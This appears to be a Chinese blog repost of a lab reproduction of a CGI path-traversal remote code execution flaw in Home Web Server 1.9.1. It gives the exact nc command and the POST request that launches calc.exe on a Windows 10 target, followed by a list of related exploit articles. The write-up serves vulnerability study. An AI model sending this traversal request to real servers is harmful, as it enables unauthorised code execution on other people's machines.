Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

最新推荐文章于 2021-03-10 02:11:50 发布
最新推荐文章于 2021-03-10 02:11:50 发布
阅读量116 收藏
点赞数
原文链接:http://www.cnblogs.com/peterpan0707007/p/7450797.html
版权

一、  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

漏洞描述:

Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序。

漏洞影响范围:

Home Web Server 1.9.1 build 164

漏洞复现:

利用原理:

NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164的主机就会自动打开计算器程序。

环境搭建:

攻击机:Kali-Linux-2017.1-vm-amd64     IP:192.168.18.250

靶机:Windows 10 Version 1703(x64)   IP:192.168.18.112

Windows10系统中安装并打开Home Web Server 1.9.1 build 164

 

Kali中使用NC建立连接,命令为:nc 192.168.18.112 80

发送POST请求:POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

当返回400响应时,按Ctrl+C终止请求,此时可以看到windows10自动打开了计算器程序

 

参考链接:https://www.exploit-db.com/exploits/42128/

转载于:https://www.cnblogs.com/peterpan0707007/p/7450797.html

weixin_30788619
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HomeWebServer,个人网站服务器
02-21
Home Web Server是一套可在多数的Windows上运作运行的WEB Server软件,你可以利用它在自己的计算机上架设一个网站,并且发布在网络上让所有人观看到你所精心制作的网页。它支持了PHP、CGI、SSL加密、流量统计、ISAPI扩充功能、虚拟目录等功能。
PHP-CGI远程代码执行
qq_53701412的博客
04-17 698
PHP SAPL
Apache / PHP 5.x Remote Code Execution Exploit
weixin_30879169的博客
10-31 224
测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* This is a code execution bug in the combination of Apache and PHP. ...
Windows Home Server 是什么?
weixin_34018169的博客
11-26 452
Windows Home Server 顾名思义,即微软推出的一款面向家庭的服务器操作系统,在 2007 年 1 月 7 日的 Consumer Electronics Show (CES) 大会上由比尔.盖茨向公众发布。Windows Home Server(以下简称 WHS),将为拥有 2 台或 2 台以上的家庭提供文件分享、自动备份、远程访问等等的...
如何用 Home Web Server 配置简单 web 服务器
dave_hu的专栏
10-24 1235
Home Web Server 是一个简便的 web 服务器,工作中俺常常用它来HTTP/HTTPS 服务器。俺当前使用的是版本:r1.5.2(build 124) 使用时发现,该服务器好像仅仅支持一块网卡,有时PC上两块以上的网卡,HTTP就启动不起来,why? 其实在其软件的官网上也是有些帮助文件的可以看看(http://downstairs.dnsalias.net/home
flink-1.9.1-bin-scala_2.11.tgz
02-26
flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz flink-1.9.1-bin-scala_2.11.tgz
PCL-1.9.1-AllInOne-msvc2017-win64 百度云下载链接
02-23
最新pcl 全家桶 vs2017 百度下载链接 包含PCL-1.9.1-AllInOne-msvc2017-win64.exe 和pcl-1.9.1-pdb-msvc2017-win64.zip
PCL-1.9.1-AllInOne-msvc2017-win64含pdb.zip
最新发布
11-16
标题"PCL-1.9.1-AllInOne-msvc2017-win64含pdb.zip"提及的是一个针对Windows操作系统的3D点云库(Point Cloud Library, 简称PCL)的安装包,特别适用于64位的Windows 7及更高版本。这个压缩包是为Visual Studio 2017...
PCL-1.9.1-AllInOne-msvc2017-win64.zip.002
05-10
pcl 1.9.1 windows 64位安装包,因为文件过大488MB,分了2份300MB为限制,这里是1,还有2单独下载
flink-1.9.1-bin-scala_2.11.zip
08-20
对于Linux和Windows用户,Flink提供了一键安装的zip包,例如"flink-1.9.1-bin-scala_2.11.zip",包含了所有运行所需组件。 四、Flink的API与编程模型 Flink提供了Java和Scala两种API,其中Scala API更贴近函数式...
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 557
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是...
php 利用一句话木马客户端.html_php-fpm Remote Code Execution 分析(CVE-2019-11043)
weixin_39869043的博客
11-23 381
漏洞简介国外安全研究员 Andrew Danau发现向服务器请求的URL中包含%0a 符号时,服务返回异常,疑似存在漏洞。Nginx+php-fpm的环境中,若Nginx上的fastcgi_split_path_info指令配置不当,在处理带包含%0a的URL时会导致正则匹配失效从而PATH_INFO的结果为空。当Nginx将包含PATH_INFO为空的fastcgi传递给后端php-fpm时,p...
web渗透--26--服务器端包含注入(SSI注入)
武天旭的博客
09-16 2790
1、漏洞描述: Web服务器通常允许开发人员在静态HTML页面内嵌入少量的动态代码,而无需处理全部的服务器端或客户端语言。这个特征称作:服务器端包含(SSI)。在SSI注入测试中,我们测试能否注入可由SSI机制解释的应用程序数据。该漏洞的成功利用允许攻击者在HTML页面中插入代码,甚至实施远程代码执行。
bWAPP攻略
weixin_30480651的博客
04-22 1541
0x00、平台介绍 按照OWASP排序 0x01、A1-Injuction(注入) Low级别:不经过任何处理的接收用户数据 Medium级别:黑名单机制,转义了部分危险数据 High级别:全部转义,或者白名单机制 1.1HTML Injection-Reflected(GET,POST) Low: Payload: <a href=”https://www...
go语言的php cgi执行程序
Yatere的天平秤
09-23 3152
/* PHP FactCGI Remote Code Execute Exploit * Date: 2012-09-15 * Author: wofeiwo@80sec.com * Affected: All PHP-FPM exposed outsie, but "system" cmd only affects >=5.3.3 * !!Note: Only for research purp
bWAPP Miss Functional Level Access Control (不合理的访问权限控制)
angry_program的博客
03-14 696
0x01、Directory Traversal - Directories 目录穿越,也被称为目录遍历/directory traversal/path traversal)是通过使用../等目录控制序列或者文件的绝对路径来访问存储在文件系统上的任意文件和目录,特别是应用程序源代码、配置文件、重要的系统文件等。 Low 观察URL, 参数directory=documents,...
bwapp 07 08 09 10
h0ld1rs的博客
08-14 366
文章目录Directory Traversal - DirectoriesDirectory Traversal - FilesHost Header Attack (Cache Poisoning)SQLiteManager Local File InclusionRemote & Local File Inclusion (RFI/LFI)Restrict Device AccessServer Side Request Forgery (SSRF)CSRF (Change Password)B
php cgi源码,PHP-CGI远程任意代码执行漏洞
weixin_36482113的博客
03-09 545
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
pcl-1.9.1-allinone-msvc2017-win64.exe
10-22
pcl-1.9.1-allinone-msvc2017-win64.exe是一个计算机软件文件的名称。 "PCL"是指点云库(Point Cloud Library),是一个开源的、通用的、大规模点云处理的软件库。点云是由大量三维坐标点组成的数据集,可以从...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值